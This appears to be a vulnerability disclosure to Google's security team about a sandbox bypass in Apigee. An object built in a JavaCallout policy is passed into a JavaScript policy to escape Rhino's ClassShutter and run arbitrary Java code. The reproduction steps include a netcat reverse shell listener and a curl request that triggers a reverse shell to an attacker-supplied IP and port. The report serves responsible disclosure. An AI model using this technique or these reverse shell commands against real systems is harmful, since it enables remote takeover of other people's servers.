Summary:
Sandbox Bypass vulnerability in Google Apigee allows a remote attacker to bypass restrictions imposed by Rhino's ClassShutter and execute arbitrary Java code.
Product:
Apigee
Vulnerability type:
Remote Code Execution (RCE)
Details
Hi Google Security Team,
With great pleasure I want to tell you about another possibility of bypassing the code execution restrictions in Apigee.
As you already know, it's possible to extend Apigee functionality by custom code - there are JavaScript, JavaCallout and PythonScript policies for this.
JavaCallout and PythonScript policies are protected from malicious code by using Java Security Manager and Java Permissions - every time when user tries to run some code, Java Security Manager checks if there are any call of potentially harmful functions (e.g. binding listeners, accessing filesystem, etc) and prevents this
(more info here)
.
As for the JavaScript, Apigee has Rhino engine under the hood, which has their own mechanisms to prevent malicios code from running -
ClassShutter
(check here)
and forbidding access to
getClass
method. Both mechanisms are implemented in Apigee.
However, due to the fact that different policies use different security mechanisms but in the same time they can share same objects by using flow (MessageContext) variables, it's possible to circumvent sandbox logic by creating a special class with malicious code in JavaCallout, passing an object of the special class into JavaScript policy and execute malicious code.
Attack scenario
The vulnerability can be exploited by a remote attacker.
The attacker can execute arbitrary Java code. The attacker can bind a reverse shell.
Steps to reproduce
Setup reverse shell listener on your publicly available server with the following command:
nc -lvnp YOUR_PORT
, where YOUR_PORT is a port on your server where you want to accept incoming reverse shell connection.
Download PoC proxy from the attachments (make-rce-great-again_rev5_2023_06_11.zip).
Create a proxy in the Apigee UI and upload PoC proxy into it.
Save revision and deploy your proxy.
Use the following command to trigger RCE in JavaScript policy in Apigee and bind a reverse shell, but first replace DOMAIN with Apigee instance domain name, YOUR_IP and YOUR_PORT with the values of your server, where you have reverse shell listener.
curl -X GET \
'https://DOMAIN/make-rce-great-again' \
--header 'ReverseShell-IP: YOUR_IP' \
--header 'ReverseShell-Port: YOUR_PORT'
Observe reverse shell connection!
PoC explanation
Proxy contains only two policies - JavaCallout and JavaScript.
In JavaCallout I create an object with
run()
malicious method and put the object into
rceObject
flow variable. In JavaScript policy I obtain reverse shell IP and port as headers (for easier reproduce), get
from flow and execute
method, which binds a reverse shell.